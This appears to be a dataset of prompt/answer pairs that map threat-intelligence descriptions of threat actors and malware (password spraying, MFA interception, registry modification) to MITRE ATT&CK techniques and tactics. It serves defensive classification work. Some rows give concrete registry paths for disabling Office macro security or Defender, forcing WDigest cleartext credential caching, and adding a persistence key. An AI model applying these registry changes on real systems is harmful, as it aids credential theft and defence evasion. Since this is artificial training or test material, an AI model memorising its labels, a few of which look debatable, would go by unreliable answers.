+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Net Crawler uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.,"Tecnique: T1110.002 Brute Force: Password Cracking, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.","Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has conducted brute force password spray attacks.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used password spraying to gain access to target systems.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used password spraying attacks to obtain valid credentials.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.","Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used a tool called Total SMB BruteForcer to perform internal password spraying.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit’s infpub.dat file uses NTLM login credentials to brute force Windows machines.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can brute force credential authentication by using a supplied list of usernames and a single password.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MailSniper can be used for password spraying against Exchange and Office 365.,"Tecnique: T1110.003 Brute Force: Password Spraying, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used credential stuffing against victim's remote services to obtain valid accounts.,"Tecnique: T1110.004 Brute Force: Credential Stuffing, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot uses brute-force attack against RDP with rdpscanDll module.,"Tecnique: T1110.004 Brute Force: Credential Stuffing, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used a custom collection method to intercept two-factor authentication soft tokens.","Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS.,"Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a proprietary tool to intercept one time passwords required for two-factor authentication.,"Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.,"Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOWPULSE can log credentials on compromised Pulse Secure VPNs during the `DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA authentication procedure.,"Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.,"Tecnique: T1111 Multi-Factor Authentication Interception, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. .","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and manipulate the Registry.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors used batch files that modified registry keys.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, the threat actors enabled Wdigest by changing the `HKLM\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest` registry value from 0 (disabled) to 1 (enabled).","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 uses a Port 22 malware variant to modify several Registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor has modified the Windows Registry to store the backdoor's configuration.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has modified the Registry to perform multiple techniques through the use of Reg.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca modified the registry using the command reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “[file path]” for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used an open source batch script to modify Windows Defender registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has deleted Registry keys during post compromise cleanup activities.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has removed security settings for VBA macro execution by changing registry values HKCU\Software\Microsoft\Office\<version>\<product>\Security\VBAWarnings and HKCU\Software\Microsoft\Office\<version>\<product>\Security\AccessVBOM.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under HKCU\Software\Microsoft\Office\.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malware that adds Registry keys for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has modified Registry settings for security tools.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Patchwork payload deletes Resiliency Registry keys created by Microsoft Office applications in an apparent effort to trick users into thinking there were no issues during application runs.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence can create, delete, or modify a specified Registry key or value.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used malware to disable Windows Defender through modification of the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Threat Group-3390 tool has created new Registry keys under `HKEY_CURRENT_USER\Software\Classes\` and `HKLM\SYSTEM\CurrentControlSet\services`.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has modify Registry values to store payloads.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has modified the Registry key HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory. Wizard Spider has also modified the WDigest registry key to allow plaintext credentials to be cached in memory.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can modify registry keys as part of setting a new pass-through authentication agent.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL is capable of setting and deleting Registry values.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can achieve persistence by modifying Registry key entries.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has overwritten registry keys for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can modify the Run registry key.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon modifies several registry keys for persistence and UAC bypass.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADCALL modifies the firewall Registry key SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot writes data into the Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has deleted Registry keys to clean up its prior activity.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can set values in the Registry to help in execution.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can modify the Registry to enable itself to run in safe mode and to modify the icons and file extensions for encrypted files.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters`,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK may modify Registry keys to store RC4 encrypted configuration information.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CSPY Downloader can write to the Registry under the %windir% variable to execute tasks.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT sets HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load to point to its executable.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas creates three Registry keys to establish persistence by adding a Windows Service.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Caterpillar WebShell has a command to modify a Registry key.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes can modify Registry values to stored information and establish persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can remove persistence-related artifacts from the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can set and delete Registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can make modifications to Registry keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can modify Registry values within HKEY_CURRENT_USER\Software\Microsoft\Office\\Excel\Security\AccessVBOM\ to enable the execution of additional code.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has modified Registry values to store encrypted orchestrator code and payloads.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker adds keys to the Registry at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services and various other Registry locations.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrackMapExec can create a registry key using wdigest.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has created Registry keys for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet adds a Registry value for its installation routine to the Registry Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System Enable LUA=”0” and HKEY_CURRENT_USER\Software\DC3_FEXEC.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has modified registry keys for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can modify Registry values to store configuration strings, keylogger, and output of components.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can make modifications to the Regsitry for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Windows adds the configuration to the Registry in XML format.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has a function to write itself to Registry values.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT deletes the Registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious has the ability to add a Class ID in the current user Registry hive to enable persistence mechanisms.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can modify the Registry to store its components.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can modify the Registry to store its configuration at `HKCU\Software\` under frequently changing names including %USERNAME% and ToolTech-RM.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy modifies conditions in the Registry and adds keys.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperStack can add the name of its communication pipe to HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has a command to create, set, copy, or delete a specified Registry key or value.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KEYMARBLE has a command to create Registry entries for storing data under HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has added and deleted keys from the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoJax has modified the Registry key ‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has modified the Registry as part of its UAC bypass process.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can manipulate the system registry on a compromised host.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has added entries to the Registry for ransom contact information.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mori can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito can modify Registry keys under HKCU\Software\Microsoft\[dllname] to store configuration values. Mosquito also modifies Registry keys under HKCR\CLSID\...\InprocServer32 with a path to the launcher.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can modify the Registry to store its configuration information.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naid creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore has the capability to edit the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Neoichor has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nerex creates a Registry subkey that registers a new service.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can add the following registry entry: HKEY_CURRENT_USER\SOFTWARE\{8 random characters}.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can modify the Registry to set the ServiceDLL for a service created by the malware for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can perform Registry operations.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PHOREAL is capable of manipulating the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE uses reg add to add a Registry Run key for persistence.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can write an encrypted token to the Registry to enable processing of remote commands.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can delete its persistence mechanisms from the registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has modified the Registry key HKLM\SOFTWARE\Microsoft\DRM to store a malicious payload.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon has modified the Registry to store its encrypted payload.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module to create, delete, or modify Registry keys.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has made registry modifications to alter its behavior upon execution.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a Registry subkey that registers a new system device.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PolyglotDuke can write encrypted JSON configuration files to the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can modify the Registry to store its configuration information in a randomly named subkey under HKCU\Software\Microsoft.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT has a command to edit the Registry on the victim’s machine.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can write its configuration file to the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can modify the Registry to save encryption parameters and system information.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can modify the `HKEY_CURRENT_USER\Software\Microsoft\Office\` registry key so it can bypass the VB object model (VBOM) on a compromised host.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM can delete all Registry entries created during its execution.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can create seemingly legitimate Registry key to store its encryption key.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin appears to have functionality to modify remote Registry information.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos has full control of the Registry, including the ability to modify it.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover has functionality to remove Registry Run key persistence as a cleanup procedure.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol (RDP).","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.","Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SOUNDBITE is capable of modifying the Registry.,"Tecnique: T1112 Modify Registry, Tactic: TA0005 Defense Evasion"
